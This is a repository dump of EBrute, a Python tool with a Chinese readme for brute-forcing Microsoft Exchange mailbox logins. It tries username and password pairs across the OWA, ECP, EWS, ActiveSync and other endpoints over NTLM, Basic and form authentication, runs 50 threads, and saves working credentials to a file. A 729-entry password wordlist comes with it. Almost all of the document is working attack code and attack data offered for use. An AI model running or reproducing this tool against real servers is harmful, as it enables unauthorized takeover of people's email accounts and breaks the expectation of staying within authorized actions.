├── EBrute.py
├── p.txt
├── readme.md
├── requirements.txt
└── u.txt


/EBrute.py:
--------------------------------------------------------------------------------
  1 | import base64
  2 | from tabulate import tabulate
  3 | import requests
  4 | import math
  5 | from requests_ntlm import HttpNtlmAuth
  6 | from tqdm import tqdm
  7 | from concurrent.futures import ThreadPoolExecutor, as_completed
  8 | import urllib3
  9 | import argparse
 10 | 
 11 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
 12 | 
 13 | 
 14 | class EBrute:
 15 |     def __init__(self, domain, mode, user_path, pass_path, ssl, timeout, thread):
 16 |         self.domain = domain
 17 |         self.url_dict = {
 18 |             'autodiscover': f'https://{self.domain}/autodiscover' if ssl == 'y' else f'http://{self.domain}/autodiscover',
 19 |             'ews': f'https://{self.domain}/ews' if ssl == 'y' else f'http://{self.domain}/ews',
 20 |             'mapi': f'https://{self.domain}/mapi' if ssl == 'y' else f'http://{self.domain}/mapi',
 21 |             'activesync': f'https://{self.domain}/Microsoft-Server-ActiveSync' if ssl == 'y' else f'http://{self.domain}/Microsoft-Server-ActiveSync',
 22 |             'oab': f'https://{self.domain}/oab' if ssl == 'y' else f'http://{self.domain}/oab',
 23 |             'rpc': f'https://{self.domain}/rpc' if ssl == 'y' else f'http://{self.domain}/rpc',
 24 |             'api': f'https://{self.domain}/api' if ssl == 'y' else f'http://{self.domain}/api',
 25 |             'owa': f'https://{self.domain}/owa/auth.owa' if ssl == 'y' else f'http://{self.domain}/owa/auth.owa',
 26 |             'ecp': f'https://{self.domain}/ecp/' if ssl == 'y' else f'http://{self.domain}/ecp/',
 27 |         }
 28 |         if mode is not None:
 29 |             self.mode = mode
 30 |             self.url = self.url_dict[mode]
 31 | 
 32 |         self.user_path = user_path
 33 |         self.pass_path = pass_path
 34 | 
 35 |         self.headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.94 Safari/537.36'}
 36 |         self.timeout = timeout
 37 |         self.thread = thread
 38 | 
 39 |     # base64 编码
 40 |     def b64encode(self, string):
 41 |         a = base64.b64encode(string.encode())
 42 |         return a.decode()
 43 | 
 44 |     # 检查可用接口
 45 |     def check_url(self):
 46 |         for key, value in self.url_dict.items():
 47 |             try:
 48 |                 res = requests.get(url=value, headers=self.headers, verify=False, timeout=self.timeout)
 49 |                 if res.status_code not in [301, 302, 403, 404]:
 50 |                     print(f'[+]{key} 接口可用')
 51 |                 else:
 52 |                     print(f'[-]{key} 接口不可用')
 53 |             except:
 54 |                 print(f'[-]{key} 接口不可用')
 55 | 
 56 |     # NTLM认证验证
 57 |     def check_NTLM_userpass(self, brute_data):
 58 |         try:
 59 |             user, password = brute_data
 60 |             res = requests.get(self.url, auth=HttpNtlmAuth(user, password), headers=self.headers, verify=False, timeout=self.timeout)
 61 |             if res.status_code not in [401, 408, 504]:
 62 |                 return brute_data
 63 |             else:
 64 |                 return None
 65 |         except:
 66 |             return None
 67 | 
 68 |     # Basic认证验证
 69 |     def check_Basic_userpass(self, brute_data):
 70 |         try:
 71 |             user, password = brute_data
 72 |             headers = self.headers.copy()
 73 |             headers["Authorization"] = f"Basic {self.tools.b64encode(f'{user}:{password}')}"
 74 |             r = requests.session()
 75 |             r.keep_alive = False
 76 |             res = r.get(self.url, headers=headers, verify=False, timeout=self.timeout)
 77 |             if res.status_code not in [401, 408, 504]:
 78 |                 return brute_data
 79 |             else:
 80 |                 return None
 81 |         except:
 82 |             return None
 83 | 
 84 |     # http认证验证
 85 |     def check_HTTP_userpass(self, brute_data):
 86 |         try:
 87 |             user, password = brute_data
 88 |             headers = self.headers.copy()
 89 |             headers["Cache-Control"] = "max-age=0"
 90 |             headers["Referer"] = "https://" + self.domain + "/owa/auth/logon.aspx?replaceCurrent=1&url=" + self.url
 91 |             headers["Cookie"] = "PrivateComputer=true; PBack=0"
 92 |             data = {
 93 |                 "destination": self.url,
 94 |                 "flags": "4",
 95 |                 "forcedownlevel": "0",
 96 |                 "username": user,
 97 |                 "password": password,
 98 |                 "passwordText": "",
 99 |                 "isUtf8": "1"
100 |             }
101 |             r = requests.session()
102 |             r.keep_alive = False
103 |             response = r.post(self.url, data=data, headers=headers, allow_redirects=False, verify=False, timeout=self.timeout)
104 |             if "Location" not in response.headers:
105 |                 return None
106 |             if "reason" not in response.headers["Location"]:
107 |                 return brute_data
108 |             else:
109 |                 return None
110 |         except:
111 |             return None
112 | 
113 |     def runner(self, brute_data):
114 |         if self.mode in ['autodiscover', 'ews', 'mapi', 'oab', 'rpc', 'api']:
115 |             res = self.check_NTLM_userpass(brute_data)
116 |         elif self.mode in ['owa', 'ecp']:
117 |             res = self.check_HTTP_userpass(brute_data)
118 |         else:
119 |             res = self.check_Basic_userpass(brute_data)
120 |         return res
121 | 
122 |     def chunks(self, arr, m):
123 |         n = int(math.ceil(len(arr) / float(m)))
124 |         return [arr[i:i + n] for i in range(0, len(arr), n)]
125 | 
126 |     def run(self):
127 |         try:
128 |             with open(self.user_path, 'r') as f:
129 |                 user_list = f.read().split('\n')
130 |                 print(f"[*]用户名数量: {len(user_list)}")
131 |             with open(self.pass_path, 'r') as f:
132 |                 pass_list = f.read().split('\n')
133 |                 print(f"[*]密码数量: {len(pass_list)}")
134 |             brute_data_list = []
135 |             for user in user_list:
136 |                 for pwd in pass_list:
137 |                     brute_data_list.append((user, pwd))
138 |             print(f"[*]总任务数: {len(brute_data_list)} | 线程数: {self.thread} | 超时时间: {self.timeout}")
139 |             # 列表分批
140 |             num = math.ceil(len(brute_data_list) / 10000)
141 |             brute_data_list_list = self.chunks(brute_data_list, num)
142 |             pi = 0
143 |             for brute_data_list in brute_data_list_list:
144 |                 pi += 1
145 |                 print(f"[*]分批执行，当前第[{pi}/{num}]批，本批数量: {len(brute_data_list)}")
146 |                 with ThreadPoolExecutor(max_workers=50) as executor:
147 |                     futures = [executor.submit(self.runner, brute_data) for brute_data in brute_data_list]
148 |                     with tqdm(total=len(futures)) as pbar:
149 |                         for future in as_completed(futures):
150 |                             try:
151 |                                 res = future.result()
152 |                                 if res is not None:
153 |                                     print(f'[+]发现弱口令: {res[0]}/{res[1]}')
154 |                                     with open('success.txt', 'a') as f:
155 |                                         data = f'域名: {self.domain} | 用户名: {res[0]} | 密码: {res[1]}\n'
156 |                                         f.write(data)
157 |                             except Exception as e:
158 |                                 print(f'[-]错误: {e}')
159 |                             finally:
160 |                                 # 每完成一个任务更新一次进度条
161 |                                 pbar.update(1)
162 |         except Exception as e:
163 |             print(f'[-]错误: {e}')
164 | 
165 | 
166 | if __name__ == '__main__':
167 |     data = [
168 |         ["接口", "说明"],
169 |         ["autodiscover", "默认NTLM认证方式，2007版本推出，用于自动配置用户在Outlook中邮箱的相关设置"],
170 |         ["ews", "默认NTLM认证方式，Exchange Web Service,实现客户端与服务端之间基于HTTP的SOAP交互"],
171 |         ["mapi", "默认NTLM认证方式，Outlook连接Exchange的默认方式，在2013和2013之后开始使用，2010 sp2同样支持"],
172 |         ["activesync", "默认Basic认证方式，用于移动应用程序访问电子邮件"],
173 |         ["oab", "默认NTLM认证方式，用于为Outlook客户端提供地址簿的副本，减轻Exchange的负担"],
174 |         ["rpc", "默认NTLM认证方式，早期的Outlook还使用称为Outlook Anywhere的RPC交互"],
175 |         ["api", "默认NTLM认证方式"],
176 |         ["owa", "默认http认证方式，Exchange owa 接口，用于通过web应用程序访问邮件、日历、任务和联系人等"],
177 |         ["ecp", "默认http认证方式，Exchange管理中心，管理员用于管理组织中的Exchange的Web控制台"],
178 |     ]
179 |     table = tabulate(data, headers="firstrow", tablefmt="grid")
180 |     parser = argparse.ArgumentParser(
181 |         description=f"exchange接口爆破\n\n{table}",
182 |         epilog="Example usage:\n[检查可用接口] python3 EBrute.py -s check -d example.com\n[指定接口爆破] python3 EBrute.py -s brute -d example.com -m rpc -u user.txt -p pass.txt",
183 |         formatter_class=argparse.RawTextHelpFormatter
184 |     )
185 |     parser.add_argument('-s', type=str, required=True, metavar='<check/brute>', help='选择模式，检查接口或者爆破')
186 |     parser.add_argument('-d', type=str, required=True, metavar='domain', help='邮箱域名')
187 |     parser.add_argument('-m', type=str, metavar='name', help='爆破接口，可单选[autodiscover,ews,mapi,activesync,oab,rpc,api,owa,ecp]')
188 |     parser.add_argument('-u', type=str, metavar='user.txt', help='用户名字段')
189 |     parser.add_argument('-p', type=str, metavar='pass.txt', help='密码字段')
190 |     parser.add_argument('--ssl', type=str, default='y', metavar='<y/n>', help='是否启用https，默认启用')
191 |     parser.add_argument('--timeout', type=int, default=10, metavar='10', help='超时等待时间，默认10秒')
192 |     parser.add_argument('--thread', type=int, default=30, metavar='30', help='线程数量，默认30线程')
193 |     args = parser.parse_args()
194 |     # 检查 'brute' 模式下的必选参数
195 |     if args.s == 'brute':
196 |         if not args.m or not args.u or not args.p:
197 |             print(f'[-]参数缺失: 在 "brute" 模式下，参数 -m, -u 和 -p 是必需的。')
198 |             exit()
199 |     eb = EBrute(args.d, args.m, args.u, args.p, args.ssl, args.timeout, args.thread)
200 |     if args.s == 'check':
201 |         eb.check_url()
202 |     elif args.s == 'brute':
203 |         eb.run()
204 | 


--------------------------------------------------------------------------------
/p.txt:
--------------------------------------------------------------------------------
  1 | super123123!
  2 | super12311!
  3 | super1231!
  4 | QF12345!
  5 | as@#$%369DF
  6 | q1w2e3r4!
  7 | p@ssw0rd
  8 | a123456!
  9 | 1qaz@WSX
 10 | yy7752!!
 11 | 123qwe!
 12 | abc123!
 13 | july2801!
 14 | 1qaz!QAZ
 15 | woaini1314!
 16 | pa$$w0rd
 17 | !QAZ2wsx
 18 | P@$$w0rd
 19 | zaq1@WSX
 20 | ZAQ!2wsx
 21 | !QAZ1qaz
 22 | P@55w0rd
 23 | 1qazZAQ!
 24 | !QAZxsw2
 25 | 1qazXSW@
 26 | pass@123
 27 | Password1!
 28 | P@ssw0rd1
 29 | password@1
 30 | P@ssword1
 31 | password@123
 32 | 123qwe!@#
 33 | p@55word
 34 | Abc123456!
 35 | !Turbine1
 36 | fxzZ75$yer
 37 | Temp2014!
 38 | Comply1!
 39 | L58jkdjP!m
 40 | sw3434!
 41 | 4&use24HyyJ
 42 | Paperindex1*
 43 | abc@123
 44 | aysq1984#
 45 | sat99#dx
 46 | gm718422@
 47 | qwe123!
 48 | Sierra#123
 49 | 123abc!
 50 | v123456*
 51 | g00dPa$$w0rD
 52 | admin@123
 53 | Jammu@123
 54 | Welcome1!
 55 | asd123!
 56 | abc123#
 57 | qwerty1!
 58 | abcd@1234
 59 | zaq1ZAQ!
 60 | Passw0rd!
 61 | pacific@123
 62 | TtAt4pu71&N
 63 | abcd1234!
 64 | india@123
 65 | abc123!@#
 66 | p@cific123
 67 | Mh@270481
 68 | a!515253
 69 | zaq1!QAZ
 70 | pass@word1
 71 | Abc@#123
 72 | aicte@123
 73 | !QAZzaq1
 74 | Asdfasdf1!
 75 | ZAQ!xsw2
 76 | ZAQ!1qaz
 77 | c123456*
 78 | Hello123!
 79 | 1q2w3e4r!
 80 | 123@abc
 81 | 123456a@
 82 | !54321qw
 83 | welcome@123
 84 | abc123@
 85 | !Q2w3e4r
 86 | qwerty@123
 87 | qwerty123!
 88 | test@123
 89 | Ebels!23!
 90 | 1234qwer!
 91 | 123456a!
 92 | *svcskl22
 93 | Password123!
 94 | Admin123!
 95 | wipro@123
 96 | 1qaz2wsx!
 97 | hugsalot*22
 98 | 12qwaszx!
 99 | ZAQ!zaq1
100 | DADWAL@007
101 | password!23
102 | Abc@12345
103 | 1q2w!Q
104 | sitdu14A@
105 | 786786Abc@
106 | 123abc!!!
107 | Qwer!234
108 | asd@123
109 | qwer1234!
110 | 123asd!
111 | Dell1599!
112 | Password2@
113 | zou0o!QE
114 | $$$$$$n135
115 | 123@123a
116 | Is9w6&r1eWB
117 | test123!
118 | P@ssw0rd123
119 | qwe123!@#
120 | a168898aBc*
121 | am4377693*
122 | 2wsx@WSX
123 | 12qw!@QW
124 | 1qaz2wsx!QAZ
125 | asdf1234!
126 | abc123!!
127 | pass@1234
128 | trustno1!
129 | Zx!2cv34
130 | @Gmail123
131 | Abcd!234
132 | Aicte@2017
133 | Ziruuff99@
134 | password#1
135 | abc123*
136 | 123qweasd!
137 | jesus#1
138 | 0502123*toy
139 | digua520!
140 | oup3Xt&3i1R
141 | P@ssword123
142 | password!1
143 | grimt@2008
144 | Macbook1!
145 | 1q2w3e!Q
146 | kathua@123
147 | abc@1234
148 | hello@123
149 | 1q2w3e!
150 | RAND#a#8
151 | 123456@a
152 | 151210asD!
153 | Kashmir@123
154 | 1qaz2wsx@
155 | asd123!@#
156 | abcd@123
157 | Pa55w0rd!
158 | aaAA11!!
159 | asdf@1234
160 | chivas#1
161 | gj7b!x
162 | bill!98aa
163 | xbox360!
164 | abhi@123
165 | dragon1!
166 | blink182!
167 | pakistan123*
168 | !234Qwer
169 | #1bitch
170 | Sopore@123
171 | aaa111!!!
172 | 123@CSCz
173 | amit@123
174 | data@123
175 | 123@qwe
176 | TRAL@123
177 | #1stunna
178 | Superman1!
179 | monkey1!
180 | Q!w2e3r4
181 | 1234@abcd
182 | Success100%
183 | admin!2010
184 | virus@91
185 | abcd123!
186 | Qq123123??
187 | @lthebest1
188 | Jesuit86!
189 | Lvr&esa158C
190 | love@123
191 | welcome123*
192 | charlie1!
193 | 1q2w3e$R
194 | Letmein1!
195 | 123qwe!@#QWE
196 | ZAchary01!!
197 | 1qay!QAY
198 | Pa55word!
199 | P@ssw0rd!
200 | memo#555
201 | sXjq82jo!6L
202 | 123!@#qwe
203 | 1q2w#E$R
204 | Apple@1500
205 | abc123$
206 | fuckyou2!
207 | test1234!
208 | 1q2w3e4r5t!
209 | a5Q&8z1bjhO
210 | princess#1
211 | 1qaz@WSX3edc
212 | jesusis#1
213 | prince1!
214 | Password01!
215 | p4$$w0rd
216 | pakistan@123
217 | candy2009**
218 | qaz123!
219 | Football1!
220 | Padakar88!
221 | 123@intel
222 | Pass123!
223 | Welcome@1
224 | abc123!!!
225 | david12!
226 | q1w2e3!
227 | rahul@123
228 | fuck0ff!
229 | 1q2w3e4r!Q
230 | Bluestar@123
231 | iloveyou2!
232 | Asdf!234
233 | Sunshine1!
234 | apple@123
235 | asdf123!
236 | 123abc!@#
237 | Thought01!
238 | w0rds@123
239 | !QAY2wsx
240 | Digua520!!
241 | Video11!
242 | wai1in123!
243 | infy@123
244 | Ih7lrpK5&2K
245 | asdf@123
246 | number1!
247 | qwe123QWE!
248 | sexy#1
249 | 1234abcd!
250 | 1qw2!QW
251 | Baseball1!
252 | qwer@1234
253 | Fahkit9!
254 | Usa@2011
255 | admin@1234
256 | michael1!
257 | pa$$word1
258 | ajay@123
259 | derp12!@
260 | ek22512!
261 | p4ssw0rd!
262 | reset@123
263 | uh97&tQl6uP
264 | welcome@12
265 | 7ujm&UJM
266 | Hello!123
267 | b141548*
268 | bla123KMR@
269 | Xyz@12345
270 | sco4phi!
271 | !Q@W3e4r
272 | Aug!272010
273 | Welcome123!
274 | ABCabc123!
275 | Sunil@123
276 | pass@12345
277 | Password$1
278 | bandit1!
279 | fuckyou1!
280 | jarox1301!
281 | kumar@123
282 | qwerty12!
283 | ravi@123
284 | singh@123
285 | 123abc@
286 | 4rfv$RFV
287 | Bablo@123
288 | zxc123!
289 | #1princess
290 | Change@123
291 | Great!11
292 | soccer#1
293 | !victor!1
294 | makara1!
295 | temp@123
296 | 3edc#EDC
297 | Qazigund@1
298 | Wai!in123
299 | Sp!tfire123
300 | bolpuR@1
301 | qwerty!1
302 | !Q2w3e4r5t
303 | computer1!
304 | country1!
305 | qazwsx123!
306 | rangers#1
307 | change#123
308 | dSjr!y5jh
309 | f00tb@ll
310 | raiders#1
311 | 123456q!
312 | 1qazxsw2!
313 | Direct456!
314 | Lra12413!
315 | b123456*
316 | pokemon1!
317 | #1pimp
318 | 5tgb%TGB
319 | Shadow1!
320 | qwe123!!
321 | 100%cool
322 | 123456qwe!
323 | zaq1XSW@
324 | !@#123qwe
325 | !password1
326 | Yankees1!
327 | a@123456
328 | iloveyou1!
329 | pass123$
330 | xsw2!QAZ
331 | 123456aA@
332 | Falak@123
333 | Shivalik@123
334 | babygirl#1
335 | qazwsx1!
336 | Prep@1234
337 | Vishal@123
338 | joshua1!
339 | 123!@#qweQWE
340 | Modern@121
341 | Snowball1!
342 | hunter1!
343 | krishna@123
344 | mes!!!346
345 | 123456789a@
346 | sp!d3rh!v3
347 | 100%jesus
348 | 1q2w3e!Q@W#E
349 | 227222Ww!
350 | Jessica1!
351 | Kathua@12345
352 | Password12!
353 | cKrazy123!
354 | 1Password!
355 | Allah@786
356 | ENergy85!!
357 | Jordan1!
358 | Jordan23!
359 | Xenacool!1
360 | lna7nrj!
361 | sachin@123
362 | soccer1!
363 | 1q2w!Q@W
364 | Qwerty!2
365 | Rajouri123@
366 | Sovkom!1975
367 | aman@123
368 | cowboys#1
369 | lucky#13
370 | q1w2Q!W
371 | 1q2w3e4r!!
372 | Acc1234$$
373 | Freedom1!
374 | Liverpool1!
375 | Shahid@123
376 | abc1234!
377 | pankaj@123
378 | pass1234!
379 | 123!@#abc
380 | 12qwas!
381 | Littleman01!
382 | Sahil@123
383 | abc!123
384 | abcd123$
385 | abcd1234$
386 | ghost1022!
387 | love123!
388 | raj@123
389 | *w4k3UPn3o!
390 | 123qwe!!
391 | GHJK!248
392 | Welcome!1
393 | alfa@123
394 | qweQWE123!
395 | 123456!a
396 | 123654789a!
397 | Minecraft1!
398 | Net@1234
399 | sarvam@310
400 | #1angel
401 | 2wsx!QAZ
402 | 3edc$RFV
403 | Jasmine1!
404 | Newuser@123
405 | a12345!
406 | aB!cDo18P
407 | dev2012@
408 | fri$$1205
409 | killer123!
410 | master1!
411 | the1&only
412 | !QA2ws3ed
413 | a1a1a1A!
414 | abcxyz@123
415 | gateways9#
416 | hottie#1
417 | l3tm31n!
418 | password1$
419 | tn20110801!
420 | united@1
421 | Allah@123
422 | D41d8cd!
423 | DeadEye1@2
424 | Ramban@123
425 | Suhail@123
426 | abc123**
427 | fr33dom!
428 | hello1!
429 | lakers#1
430 | p455w0rd!
431 | password@12
432 | #1player
433 | 100%sexy
434 | 12345678a!
435 | 123@abcd
436 | Matthew1!
437 | Qwerty!23
438 | a1b2c3d4!
439 | hua@5817
440 | skate0n!
441 | zxcvbnm1!
442 | !QA2ws
443 | 123zxc!
444 | Blessed1!
445 | Core2016!
446 | Cw$z6q3f4fH
447 | Naruto123@
448 | Summer1!
449 | Xddxdd12!
450 | ccare12!
451 | 1q@W3e$R
452 | Cl1010779!
453 | G6rf$$5rt
454 | Muskan@123
455 | g6yf$$stt
456 | qwerty@12345
457 | redsox#1
458 | 000webhost!
459 | 100%love
460 | 1qaz!QAZ2wsx
461 | Google@123
462 | abc123***
463 | angel#1
464 | asdasd1!
465 | asdqwe123!
466 | ashish@123
467 | bearbear21!
468 | deepak@123
469 | dr@g0n
470 | killer1!
471 | 1q2w3e4r&
472 | 2wsx#EDC
473 | 50cent!
474 | Airborne1!
475 | Nicholas1!
476 | P@55w0rd!
477 | Waseem@123
478 | bram1414!
479 | cutie#1
480 | myspace1!
481 | 123456?a
482 | Madison1!
483 | ali123!
484 | buster1!
485 | iMac@0910
486 | lol123!
487 | parool14?
488 | str00ck!S
489 | test@1234
490 | Apple123!
491 | Dosses12!
492 | Marines1!
493 | Qwerty12345!
494 | Sharma@123
495 | Start123!
496 | abc@123456
497 | lucky13!
498 | nokia@123
499 | qwQW12!
500 | Hopkins96!
501 | Princess1!
502 | login@123
503 | qqQQ11!!
504 | qw12QW!
505 | qwe@123
506 | qwerty123@
507 | steelers#1
508 | vc111!!!
509 | xx0jsk!3sk
510 | zxasqw12!
511 | !QAZ2wsx3edc
512 | 123456789a!
513 | 123qwe&
514 | Inuyasha1!
515 | Online@123
516 | Patrick1!
517 | a6d!3ll3
518 | dell@123
519 | ganesh@123
520 | ichigo100%
521 | lucky#7
522 | master@123
523 | oicu812!
524 | !123456a
525 | Chicken1!
526 | Danish@123
527 | G@briel123
528 | Kk44298104!
529 | P@ssword01
530 | SwaGo!1
531 | abhishek@123
532 | akshay@123
533 | asd@1234
534 | card@1234
535 | football#1
536 | password*1
537 | samsung1!
538 | samsung@123
539 | sunny@123
540 | user@123
541 | vikas@123
542 | 0000qwe!
543 | 12345qwert!
544 | 123abc*
545 | Andrew1!
546 | Jennifer1!
547 | Orange1!
548 | Passw0rd1!
549 | Soccer12!
550 | annie23!
551 | asdfgh1!
552 | gaurav@123
553 | hallo123!
554 | hsaa#007
555 | john@123
556 | manish@123
557 | rangers1!
558 | sonu@123
559 | stef#1
560 | !B1c9af37
561 | 1234@qwer
562 | @wsx3edc
563 | Crystal1!
564 | JAHjah2288#
565 | Monkey123!
566 | Something1!
567 | fake@1234
568 | fwt@$$jj4d
569 | mnbvcxz1!
570 | naruto1!
571 | password@2
572 | player66!
573 | qwer123!
574 | tata@123
575 | zyte12!!
576 | !4zrEza1n7P
577 | #1love
578 | #@!321ewq
579 | 100%bitch
580 | 4ever&ever
581 | @slab3
582 | Blogger1!
583 | Letme1n!
584 | Paki045*
585 | Pepsicola1!
586 | Srinagar@786
587 | Zion151210!
588 | abc*123
589 | anil@123
590 | blue123!
591 | family#1
592 | godis#1
593 | qweasd123!
594 | qwerty@1
595 | rajesh@123
596 | !QAZ3edc
597 | #1hottie
598 | #EDC3edc
599 | 123abc!!
600 | Akash@123
601 | Fw@rtyb2d
602 | a1b2c3!
603 | iamgay33!
604 | logite123!
605 | mexico#1
606 | pass#123
607 | pooja@123
608 | qwerty1234!
609 | secure@123
610 | vijay@123
611 | 15Sn0wba!!82
612 | 1a2b3c4d!
613 | @WSX2wsx
614 | Aditya@123
615 | Alexander1!
616 | Diamond1!
617 | Direct17!
618 | Pa$$w0rd1
619 | Prince@786
620 | Sample!123
621 | Starwars1!
622 | Thisisgay1!
623 | Ummer@123
624 | cheese1!
625 | n4003070***
626 | passwd@123
627 | whatever1!
628 | 12qwasyx!
629 | 1q1q1q!Q
630 | Airforce1!
631 | Bla@12345
632 | Chester1!
633 | Cooper1276!
634 | Lahore@123
635 | Pinkfloyd1!
636 | Rohit@123
637 | abcd1234@
638 | caddy&22
639 | changeme!1
640 | dani669!!
641 | india@1234
642 | justin#1
643 | lily123!
644 | love@143
645 | priya@123
646 | qazwsx123@
647 | sanjay@123
648 | vdch@123
649 | !QAZ2wsx#EDC
650 | #1lover
651 | %E2%82%AC
652 | 123456a*
653 | 123@com
654 | 123qaz!
655 | 3xchange!
656 | Aadil@123
657 | Basketball1!
658 | Darpan@@7
659 | airtel@123
660 | ashu@123
661 | blood43!
662 | computer@123
663 | monkey#1
664 | password123$
665 | q1w2e3R$
666 | satyam123$
667 | seo@12345
668 | smadan90!
669 | 1q2w3e!!
670 | Jackson1!
671 | Kxrider052!
672 | Monster1!
673 | P@ss1234
674 | Password1@
675 | asd123!!
676 | hulk@150
677 | kiran@123
678 | limpbizkit1!
679 | pass123#
680 | q1w2e3!!
681 | scotland1!
682 | skyking009*
683 | 12345a@
684 | 1234qwe!
685 | 1234qwer$
686 | 123qwerty!
687 | 1million$
688 | 1q2w3e4r@
689 | 521baobei!!!
690 | Homestar007!
691 | Mmmm!111
692 | P4ssword!
693 | Steelers1!
694 | T4u!p1eww4P
695 | Thunder1!
696 | William1!
697 | abcd123@
698 | abcd@12345
699 | company@123
700 | gators#1
701 | guitar1!
702 | khan@123
703 | manoj@123
704 | p0pmagicwd**
705 | prince@123
706 | qwerty123$
707 | suresh@123
708 | tmr777!!
709 | wqazx4rry0n!
710 | zxcvbnm@123Z
711 | Chocolate1!
712 | M0nster!
713 | P@$$w0rd1
714 | PA$$word01
715 | Password1*
716 | abacus1!
717 | anu17488@
718 | chris12345!
719 | compaq1!
720 | fucky0u!
721 | love#1
722 | nitin@123
723 | qwe123QWE!@#
724 | qwert123!
725 | star@123
726 | yankees#1
727 | zaq12wsx!
728 | #1family
729 | #EDC4rfv


--------------------------------------------------------------------------------
/readme.md:
--------------------------------------------------------------------------------
 1 | 利用 Exchange 服务器 Web 接口爆破邮箱账户
 2 | 
 3 | 参考 [grayddq/EBurst](https://github.com/grayddq/EBurst) 项目使用python3重构
 4 | 
 5 | ### 使用说明
 6 | ```angular2html
 7 | python3 EBrute.py -h  
 8 | ```
 9 | ```                                                           
10 | usage: EBrute.py [-h] -s <check/brute> -d domain [-m name] [-u user.txt] [-p pass.txt] [--ssl <y/n>] [--timeout 10] [--thread 30]
11 | 
12 | exchange接口爆破
13 | 
14 | +--------------+---------------------------------------------------------------------------------------------+
15 | | 接口         | 说明                                                                                        |
16 | +==============+=============================================================================================+
17 | | autodiscover | 默认NTLM认证方式，2007版本推出，用于自动配置用户在Outlook中邮箱的相关设置                   |
18 | +--------------+---------------------------------------------------------------------------------------------+
19 | | ews          | 默认NTLM认证方式，Exchange Web Service,实现客户端与服务端之间基于HTTP的SOAP交互             |
20 | +--------------+---------------------------------------------------------------------------------------------+
21 | | mapi         | 默认NTLM认证方式，Outlook连接Exchange的默认方式，在2013和2013之后开始使用，2010 sp2同样支持 |
22 | +--------------+---------------------------------------------------------------------------------------------+
23 | | activesync   | 默认Basic认证方式，用于移动应用程序访问电子邮件                                             |
24 | +--------------+---------------------------------------------------------------------------------------------+
25 | | oab          | 默认NTLM认证方式，用于为Outlook客户端提供地址簿的副本，减轻Exchange的负担                   |
26 | +--------------+---------------------------------------------------------------------------------------------+
27 | | rpc          | 默认NTLM认证方式，早期的Outlook还使用称为Outlook Anywhere的RPC交互                          |
28 | +--------------+---------------------------------------------------------------------------------------------+
29 | | api          | 默认NTLM认证方式                                                                            |
30 | +--------------+---------------------------------------------------------------------------------------------+
31 | | owa          | 默认http认证方式，Exchange owa 接口，用于通过web应用程序访问邮件、日历、任务和联系人等      |
32 | +--------------+---------------------------------------------------------------------------------------------+
33 | | ecp          | 默认http认证方式，Exchange管理中心，管理员用于管理组织中的Exchange的Web控制台               |
34 | +--------------+---------------------------------------------------------------------------------------------+
35 | 
36 | optional arguments:
37 |   -h, --help        show this help message and exit
38 |   -s <check/brute>  选择模式，检查接口或者爆破
39 |   -d domain         邮箱域名
40 |   -m name           爆破接口，可单选[autodiscover,ews,mapi,activesync,oab,rpc,api,owa,ecp]
41 |   -u user.txt       用户名字段
42 |   -p pass.txt       密码字段
43 |   --ssl <y/n>       是否启用https，默认启用
44 |   --timeout 10      超时等待时间，默认10秒
45 |   --thread 30       线程数量，默认30线程
46 | 
47 | Example usage:
48 | [检查可用接口] python3 EBrute.py -s check -d example.com
49 | [指定接口爆破] python3 EBrute.py -s brute -d example.com -m rpc -u user.txt -p pass.txt
50 | ```


--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
1 | tabulate==0.9.0
2 | requests==2.32.3
3 | requests-ntlm==1.2.0
4 | tqdm==4.65.0
5 | urllib3==1.26.18


--------------------------------------------------------------------------------